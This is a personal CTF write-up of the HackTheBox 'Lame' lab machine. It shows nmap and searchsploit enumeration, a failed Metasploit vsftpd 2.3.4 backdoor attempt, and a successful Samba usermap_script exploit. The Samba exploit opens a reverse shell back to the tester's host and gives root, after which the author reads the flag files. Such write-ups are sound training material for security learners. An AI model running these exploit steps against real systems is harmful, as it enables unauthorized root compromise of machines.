---
title: "Hackthebox: lame"
date: 2020-06-22
url: htb/lame
categories: ['writeup']
tags: ['ctf', 'hacking', 'htb']
summary: hackthebox lame writeup
---

I've spent quite some time in the [hackthebox](https://hackthebox.eu) platform so why not make my notes public?

This is my first writeup. As usual, the box is lame. It comes "as is" from my notes, but I'll try to make it more meaningful and explanatory in the future.

## Enumeration

First things first. Let's start with the usual scan:

{{< highlight shell >}}
map -A -T4 -v 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.15
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
{{< /highlight >}}

It's funny, I use to run `nmap`in a different way now:
```
nmap -sC -sV -oA output/file <target>
```


So we have:

- ssh — we can skip it, ssh is not usually vulnerable
- samba 3.0.20
- ftp
  - vsftpd 2.3.4

Let's search for exploits in metasploit:

{{< highlight shell >}}
searchsploit vsftpd 2.3.4
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                        | unix/remote/17491.rb
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
{{< /highlight >}}

Interesting. There is a known vulnerability for the `vsftp` version running in the box. I would say these boxes where you have a CVE are easy. And yhis particular linux box is one of the easiest.

{{< highlight shell >}}
msfdb start
msfconsole
search vsftpd 2.3.4
Matching Modules
================
 
 # Name Disclosure Date Rank Check Description
 - ---- --------------- ---- ----- -----------
 0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
 1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
 2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
 3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
 
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show
show actions    show auxiliary  show exploits   show nops       show plugins   
show advanced   show encoders   show info       show options    show post      
show all        show evasion    show missing    show payloads   show targets   
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
 
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
 
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
 
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
 
[-] 10.10.10.3:21 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
 
[-] 10.10.10.3:21 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > back
msf5 > exit
{{< /highlight >}}

Mmm, it seems it does not work.

We also have samba 3.0.20, let`s trye:

{{< highlight shell >}}
searchsploit samba 3.0.20
------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                          |  Path
------------------------------------------------------------------------ ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                  | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Me | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                   | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                   | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                           | linux_x86/dos/36741.py
------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
{{< /highlight >}}

Again, we have suitable CVEs. Let's go for it!

{{< highlight shell >}}
msf5 > search usermap
 
Matching Modules
================
 
   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution
 
 
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit
 
[*] Started reverse TCP double handler on 10.10.14.15:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo hQ7DHGJcIvMlpKXV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "hQ7DHGJcIvMlpKXV\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.3:56484) at 2020-06-22 12:39:54 -0400
 
who
root pts/0 Jun 19 05:31 (:0.0)
We're done, this one is trivial. Let's try to get the flag hashes.
cd /root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt   
92...df
     
ls /home
ftp
makis
service
user
    
ls /home/makis
user.txt
 
cat /home/makis/user.txt
69...c5
{{< /highlight >}}

Funny enough, we got the *root* flag before the *user* flag. This may happen in some more machines.
